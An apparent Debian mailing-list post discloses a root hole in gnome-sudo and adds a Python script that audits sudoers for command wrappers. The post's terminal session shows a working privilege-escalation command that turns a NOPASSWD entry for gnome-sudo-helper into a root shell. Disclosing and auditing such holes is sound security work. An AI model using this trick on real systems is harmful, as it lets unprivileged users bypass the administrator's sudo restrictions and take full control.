
If you care about debian's security read this



Hello,

gnome-sudo's and configlet's maintainers are trying to let a root hole
go into woody

I've reported a grave bug on gnome-sudo because it will let you run
anything as root when you configure it to be useful, even if you don't
have ways of doing that with normal sudo... see this:

[/etc]
[root]@[couve] # cat sudoers
# User privilege specification

root    ALL=(ALL) ALL
kov     ALL = (root) NOPASSWD: /usr/sbin/chroot, /usr/sbin/pbuilder, /usr/lib/gnome-sudo/gnome-sudo-helper, PASSWD: /usr/bin/apt-get
[/etc]
[root]@[couve] # exit
[/etc]
[kov]@[couve] $ sudo /usr/lib/gnome-sudo/gnome-sudo-helper /tmp/a \ /bin/sh
GNOME_SUDO_DONE sh-2.05a# whoami
root
sh-2.05a# exit
[/etc]
[kov]@[couve] $ sudo /bin/sh
Password:
Sorry, user kov is not allowed to execute '/bin/sh' as root on couve.horta.
[/etc]
[kov]@[couve] $ gnome-sudo ls /
bin   cdrom  floppy  lib         opt   sbin     usr      vmlinuz.old
boot  dev    hda6    lost+found  proc  scratch  var
cdr   etc    home    mnt         root  tmp      vmlinuz

now I remove gnome-sudo-helper from my /etc/sudoers:

[/etc]
[kov]@[couve] $ sudo /usr/lib/gnome-sudo/gnome-sudo-helper /tmp/a /bin/sh
Sorry, user kov is not allowed to execute '/usr/lib/gnome-sudo/gnome-sudo-helper /tmp/a /bin/sh' as root on couve.horta.
[/etc]
[kov]@[couve] $ gnome-sudo ls /
[/etc]
[kov]@[couve] $

no more root hole, but gnome-sudo doesn't work anymore...
(and it doesn't even give an error message... that's why bug
#133402 is related to this problem)

(the lines may be wrapped by my mail client)

the only way to use gnome-sudo is to add /usr/lib/gnome-sudo/gnome-sudo-helper to /etc/sudoers... and the
problem here is bigger, because the program/installation does not
warn the user that he has a root hole after being able to use gnome-sudo

details in bug #134521, which was grave but has just been reseverited to
'wishlist' by configlet's maintainer... sorry for bringing this to -devel
but the package's maintainer just doesn't care about this...

[]s!

-- 
kov@debian.org: Gustavo Noronha <http://www.metainfo.org/kov>
Debian: <http://www.debian.org> * <http://debian-br.cipsga.org.br>
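
The sudoers entry in the post grants NOPASSWD on a helper that execs whatever command it is handed, which is the whole of the root hole. Below is an added example (not code from the post, from gnome-sudo or from Debian) that parses the user specifications shown above, flags commands which amount to "run anything as root", and rewrites the file the way the post does by hand, removing the helper while keeping the NOPASSWD/PASSWD state of the other commands intact. Assumptions: the sample sudoers text is constructed from the mail; the set of "command wrapper" binaries is seeded only with the helper the post demonstrates and must be extended for other wrappers; the parser handles plain `user host = (runas) commands` lines only, not aliases.

```python
import re

# Constructed sample input: the two user specifications shown in the post
# (comment line included, as in the mail).
SAMPLE_SUDOERS = """\
# User privilege specification

root    ALL=(ALL) ALL
kov     ALL = (root) NOPASSWD: /usr/sbin/chroot, /usr/sbin/pbuilder, /usr/lib/gnome-sudo/gnome-sudo-helper, PASSWD: /usr/bin/apt-get
"""

# Binaries that take a command on their argument list and exec it as-is.
# Assumption: seeded only with the helper the post demonstrates; extend it
# with any other wrapper that behaves the same way on your systems.
COMMAND_WRAPPERS = {"/usr/lib/gnome-sudo/gnome-sudo-helper"}

# user  host = (runas) command-list      (the runas part is optional)
SPEC_RE = re.compile(r"^(\S+)\s+([^\s=]+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")


def parse_sudoers(text):
    """Flatten plain user specifications into one dict per command.

    Defaults and *_Alias lines are skipped; that is enough for the file
    in the post.  NOPASSWD:/PASSWD: tags apply to every following command
    on the line until the tag changes, as sudo itself reads them.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or "_Alias" in line.split()[0]:
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        user, host, runas, cmds = m.groups()
        runas = runas or "root"          # sudo's runas_default
        nopasswd = False
        for item in cmds.split(","):
            item = item.strip()
            while True:
                if item.startswith("NOPASSWD:"):
                    nopasswd, item = True, item[len("NOPASSWD:"):].strip()
                elif item.startswith("PASSWD:"):
                    nopasswd, item = False, item[len("PASSWD:"):].strip()
                else:
                    break
            entries.append({"user": user, "host": host, "runas": runas,
                            "nopasswd": nopasswd, "command": item})
    return entries


def find_root_holes(entries):
    """Entries letting a non-root user run arbitrary programs as root:
    either the literal ALL, or a wrapper that execs its argument."""
    holes = []
    for e in entries:
        if e["user"] == "root" or e["runas"] not in ("root", "ALL"):
            continue
        if e["command"] == "ALL" or e["command"].split()[0] in COMMAND_WRAPPERS:
            holes.append(e)
    return holes


def render_sudoers(entries):
    """Rebuild user specifications, emitting a NOPASSWD:/PASSWD: tag only
    where the password state changes (the form the original file used)."""
    lines, current, parts, nopasswd = [], None, [], False

    def flush():
        if current is not None:
            user, host, runas = current
            lines.append("%s\t%s = (%s) %s" % (user, host, runas, ", ".join(parts)))

    for e in entries:
        key = (e["user"], e["host"], e["runas"])
        if key != current:
            flush()
            current, parts, nopasswd = key, [], False
        tag = ""
        if e["nopasswd"] != nopasswd:
            nopasswd = e["nopasswd"]
            tag = "NOPASSWD: " if nopasswd else "PASSWD: "
        parts.append(tag + e["command"])
    flush()
    return "\n".join(lines) + "\n"


def drop_command(text, path):
    """The fix from the post: remove `path` from every command list without
    changing the password requirement of the commands that remain."""
    kept = [e for e in parse_sudoers(text) if e["command"].split()[0] != path]
    return render_sudoers(kept)


if __name__ == "__main__":
    for hole in find_root_holes(parse_sudoers(SAMPLE_SUDOERS)):
        print("root hole: %(user)s may run %(command)s as %(runas)s"
              " (nopasswd=%(nopasswd)s)" % hole)
    print(drop_command(SAMPLE_SUDOERS, "/usr/lib/gnome-sudo/gnome-sudo-helper"))
```

Run against the sample, the audit reports the gnome-sudo-helper entry and nothing else; after `drop_command` the remaining commands keep exactly the tags they had, and the audit comes back empty, which matches the "no more root hole" state in the post. Note that the check is only as good as COMMAND_WRAPPERS: any other binary that execs a caller-supplied program has to be added to that set by hand.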


